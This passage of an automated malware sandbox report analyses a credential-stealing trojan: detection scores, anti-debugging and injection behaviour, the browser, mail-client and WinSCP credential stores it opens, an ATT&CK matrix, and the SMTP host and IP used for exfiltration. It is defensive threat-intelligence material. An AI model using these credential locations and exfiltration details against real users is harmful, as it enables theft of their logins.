          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99671Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99562Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99343Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99234Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99123Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 99013Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98906Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98796Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98687Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98578Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98466Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98358Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98136Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 98006Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97844Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97723Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97485Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97344Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97204Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 97056Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 96952Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 96843Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 96735Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 96625Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeAPI call chain: ExitProcess graph end nodegraph_3-30853
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040636B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_0040B0AF GetProcessHeap,1_2_0040B0AF
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_004018F8 SetUnhandledExceptionFilter,1_2_004018F8
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040636B
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_00401BF3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00401BF3
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_00401796 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401796
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_00401E16 SetUnhandledExceptionFilter,3_2_00401E16
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C83
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004060A4
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F2A

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\zjlxnt.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeProcess created: C:\Users\user\AppData\Local\Temp\zjlxnt.exe C:\Users\user\AppData\Local\Temp\zjlxnt.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_00401A05 cpuid 1_2_00401A05
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 1_2_0040167D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0040167D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeCode function: 3_2_0217F418 GetUserNameW,3_2_0217F418

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zjlxnt.exe PID: 6076, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zjlxnt.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: Yara matchFile source: 00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zjlxnt.exe PID: 6076, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.575938781.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zjlxnt.exe PID: 6076, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation
          Path Interception1
          Access Token Manipulation
          1
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts2
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts111
          Process Injection
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          Exfiltration Over Bluetooth1
          Non-Standard Port
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Obfuscated Files or Information
          Security Account Manager2
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration1
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Software Packing
          NTDS127
          System Information Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer11
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
          Virtualization/Sandbox Evasion
          LSA Secrets23
          Security Software Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation
          Cached Domain Credentials131
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Process Injection
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Owner/User Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
          Remote System Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe49%ReversingLabsWin32.Trojan.Nemesis
          file.exe48%VirustotalBrowse
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\zjlxnt.exe42%ReversingLabsWin32.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\zjlxnt.exe35%VirustotalBrowse
          SourceDetectionScannerLabelLinkDownload
          3.2.zjlxnt.exe.4800000.4.unpack100%AviraTR/Spy.Gen8Download File
          3.2.zjlxnt.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
          http://ocsp.sectigo.com0A0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://crt.sectigo?0%Avira URL Cloudsafe
          http://crl.usertru0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          us2.smtp.mailhostbox.com
          208.91.199.224
          truefalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://ocsp.sectigo.com0Azjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://sectigo.com/CPS0zjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
              high
              http://us2.smtp.mailhostbox.comzjlxnt.exe, 00000003.00000002.575938781.00000000023E9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://crt.sectigo?zjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crl.usertruzjlxnt.exe, 00000003.00000002.577003560.0000000005458000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                208.91.199.224
                us2.smtp.mailhostbox.comUnited States
                394695PUBLIC-DOMAIN-REGISTRYUSfalse
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:830908
                Start date and time:2023-03-20 19:42:10 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 4s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:file.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@6/4@1/1
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 20.4% (good quality ratio 19%)
                • Quality average: 79.3%
                • Quality standard deviation: 29.7%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 64
                • Number of non-executed functions: 61
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                19:43:17API Interceptor30x Sleep call for process: zjlxnt.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                208.91.199.224cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                  ORIGINAL_SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                    dxet2ADvMO.exeGet hashmaliciousAgentTeslaBrowse
                      final_docs..exeGet hashmaliciousAgentTeslaBrowse
                        SST_Statement-_Feb_2023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                          INV_50057_0111986532214.exeGet hashmaliciousAgentTeslaBrowse
                            PENDING_ORDERS.exeGet hashmaliciousAgentTeslaBrowse
                              ORIGINAL_SHIPPING_DELIVERY.exeGet hashmaliciousAgentTeslaBrowse
                                file.exeGet hashmaliciousAgentTeslaBrowse
                                  file.exeGet hashmaliciousAgentTeslaBrowse
                                    file.exeGet hashmaliciousAgentTeslaBrowse
                                      TAnmPu7swv.exeGet hashmaliciousAgentTeslaBrowse
                                        02bj8wSMA7.exeGet hashmaliciousAgentTeslaBrowse
                                          file.exeGet hashmaliciousAgentTeslaBrowse
                                            Invoices_n_112_113.exeGet hashmaliciousAgentTeslaBrowse
                                              vbc.exeGet hashmaliciousAgentTeslaBrowse
                                                Zapytanie_o_cen#U0119.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                  Dhl_despacho_7348255142.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                    FtNVQPUPY6.exeGet hashmaliciousAgentTeslaBrowse
                                                      YLRU5i5KBy.exeGet hashmaliciousAgentTeslaBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        us2.smtp.mailhostbox.comcotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.224
                                                        PO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.223
                                                        2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        Enercov_PO_202246755181.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        ORIGINAL_SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        Shipping_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.225
                                                        JSyBhM74Sj.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        dxet2ADvMO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        Statement- Feb 2023.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        PO_190834253.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.198.143
                                                        final_docs..exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        SST_Statement-_Feb_2023.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.224
                                                        o72aqcE3gB.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        wH6Ft5wweX.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        r05593373.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        INV_50057_0111986532214.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        SecuriteInfo.com.Win32.PWSX-gen.32656.4667.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        RFQ_080323MECHNBIMar-23.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.225
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        PUBLIC-DOMAIN-REGISTRYUScotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.224
                                                        PO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        DHL_Shipping_Document2.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 208.91.199.223
                                                        2303-64687.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        New_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.115
                                                        https://www.dr-aljumaa.com/favicon.icoGet hashmaliciousUnknownBrowse
                                                        • 162.222.226.174
                                                        DHL_AWB_copy_&_draft_COO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        Enercov_PO_202246755181.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.198.143
                                                        http://comfin.mx/notasbancos/16eluniversal14-supConvencionBancaria-bancoppGet hashmaliciousUnknownBrowse
                                                        • 199.79.62.169
                                                        ORIGINAL_SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        DISCOUNT_PRICES.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                        • 199.79.62.12
                                                        Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 216.10.248.111
                                                        Shipping_doc.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        PURCHASE_CONTRACT.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.12
                                                        ARRIVAL_NOTICE.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.12
                                                        Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 216.10.248.111
                                                        https://www.dropbox.com/scl/fi/m5mvxzev2p1sywrwhx645/You-have-received-some-incoming-secured-fax-document.paper?dl=0&rlkey=ssarv205bn9gfqqvovrswidd9Get hashmaliciousHTMLPhisherBrowse
                                                        • 103.211.216.141
                                                        JSyBhM74Sj.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.223
                                                        dxet2ADvMO.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.91.199.224
                                                        PO2300109.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.79.62.12
                                                        No context
                                                        No context
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6061
                                                        Entropy (8bit):7.152729915217053
                                                        Encrypted:false
                                                        SSDEEP:96:Farc6oYBg/DrYuvk2XO5oSwsnP+ZjVe9LWKdUdAAU0HJsUV7scbvbz4LUtnnIgAf:FarcRZ3hX1ShnP2jE9LXdEAARpP1rbvy
                                                        MD5:8009F662B5AB8050A4F5AEEAE94BA722
                                                        SHA1:FE55E206DB001BF178AD87DF2BC4A6A899482D2A
                                                        SHA-256:3A5D1645A4DAB4AEF75FA65EC4B7585917C1527C0B913287179168B5EF18147A
                                                        SHA-512:6CB0A5BBE859263A2D97745F06AC33952C783314F6B49B7CD387B4276C947BD51EF9ADE02CEC2F0D5E38561B9895CF6DB1262F2790E1530A9FCC33879C139E26
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):381886
                                                        Entropy (8bit):7.672264691913513
                                                        Encrypted:false
                                                        SSDEEP:6144:Ntm1Z1J8zN5MoAqIIGXyCk4642/VGan7ZhhlqbK88SlI5NX1GKGsGZExocCp:NI1ix5lAmxd4P27VKlGNX1GKGsHG
                                                        MD5:BD05EB6029978E8A69332B07B4334349
                                                        SHA1:990D883D1827493EB50825719F585D1ABC1113FB
                                                        SHA-256:02D5CDB8D67E1003EA4A6134F8C935F7EABAEF5761AB25362353400F7892483A
                                                        SHA-512:E6DB920547761D9E66448305DFE1984AE553DDC4DD52C50526854146C2E052604A11F4A048EA03CABB257900A1175B681AE300EA653B2D463B7CCBE026D95A19
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.+......,...................n............+.......+..............................................................................+...........................................................................................................................................................G...................j...........................................................................................................................................F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):268841
                                                        Entropy (8bit):7.971116927383392
                                                        Encrypted:false
                                                        SSDEEP:6144:Stm1Z1J8zN5MoAqIIGXyCk4642/VGan7ZhhlqbK88SlI5NF:SI1ix5lAmxd4P27VKlGNF
                                                        MD5:3D14489C8EE3D764649F70D1A27542F9
                                                        SHA1:59E98B00E554B4E30DEF17AEBF731571F88CBFCE
                                                        SHA-256:0645F4AF22D167E907F2C7CEA114D05CB45CF3CE639CECD67E66DE9D0E190701
                                                        SHA-512:65457B732E118EFA58971F670D3E6D335983914603BA84F0C774786A777C5778BD3506C76393585E55B6D7790167E2A5DECC745015452BF229FC38ED71126076
                                                        Malicious:false
                                                        Reputation:low
